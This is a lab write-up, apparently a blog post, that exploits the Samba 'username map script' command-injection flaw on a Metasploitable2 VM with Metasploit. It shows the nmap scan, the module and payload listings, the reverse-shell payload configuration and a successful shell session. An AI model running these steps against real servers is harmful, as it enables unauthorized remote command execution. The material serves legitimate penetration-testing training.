cause
Passing the unfiltered user input provided through MS-RPC calls /bin/sh when calling the defined external script, in smb.conf, which results in allowing remote command execution
lab environment
The target machine used here is metasploitable2
linux攻击机:192.168.43.113
linux目标机:192.168.43.23
Exploit attack
First scan the target machine to collect available service information, and use nmap to scan to view the open ports of the system and related applications
msf5 > nmap -sV 192.168.43.23
[*] exec: nmap -sV 192.168.43.23
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-02 22:22 CST
Nmap scan report for 192.168.43.23
Host is up (0.0012s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.70%I=7%D=9/2%Time=5F4FAAAA%P=x86_64-pc-linux-gnu%r(NULL
SF:,2B,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(kali\)\SF:n");
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect resultsat https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.39 seconds
You can see that the target machine is running the Samba 3.x service, and you can find the utilization module by searching samba 3.x
msf5 > search samba 3.x
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/admin/http/intersil_pass_reset 2007-09-10 normal Yes Intersil (Boa) HTTPd Basic Authentication Password Reset
2 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
3 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
4 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
5 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
6 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules
7 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
8 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert Meter SSH Private Key Exposure Scanner
9 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
10 exploit/linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection
11 exploit/linux/http/imperva_securesphere_exec 2018-10-08 excellent Yes Imperva SecureSphere PWS Command Injection
12 exploit/linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution
13 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
14 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
15 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
16 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
17 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
18 exploit/multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution
19 exploit/multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution
20 exploit/multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution
21 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
22 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
23 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
24 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
25 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
26 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
27 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
28 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
29 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
30 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
31 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
32 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
33 exploit/unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution
34 exploit/unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution
35 exploit/unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability
36 exploit/unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection
37 exploit/windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow
38 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
39 exploit/windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow
40 exploit/windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow
41 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
42 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
43 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
44 post/linux/gather/enum_configs normal No Linux Gather Configurations
Use the exploit module, and then view the available attack payload modules under the exploit module
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
2 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
3 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
7 cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
8 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
15 cmd/unix/generic normal No Unix Command, Generic Command Execution
16 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
17 cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
18 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
19 cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
20 cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
21 cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
22 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
23 cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
24 cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
25 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
26 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
27 cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
28 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
29 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
30 cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
31 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
32 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
33 cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
34 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
35 cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
Set the cmd/unix/reverse reverse attack load module
Set the IP address of the target machine
Set the port number
for exploiting Set the IP address of the host launching the attack
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.43.23
RHOSTS => 192.168.43.23
msf5 exploit(multi/samba/usermap_script) > set RPORT 445
RPORT => 445
msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.43.113
LHOST => 192.168.43.113
msf5 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.43.23 yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.43.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
After setting up, let's exploit or run
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 192.168.43.113:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oQwX81x659bJ0os8;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "oQwX81x659bJ0os8\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (192.168.43.113:4444 -> 192.168.43.23:49794) at 2020-09-02 23:02:57 +0800
After the msf attack is successful, the shell of the target host will be obtained. In order to verify that the shell is of the target machine, you can query the host name, user name and IP
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:fa:dd:2a
inet addr:192.168.43.23 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fefa:dd2a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2410 errors:0 dropped:0 overruns:0 frame:0
TX packets:1961 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:190106 (185.6 KB) TX bytes:138231 (134.9 KB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:278 errors:0 dropped:0 overruns:0 frame:0
TX packets:278 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:110249 (107.6 KB) TX bytes:110249 (107.6 KB)
You can see that the command has been executed.
to sum up
Summary: Attack for five minutes and build for two hours. It's another simple and fulfilling day!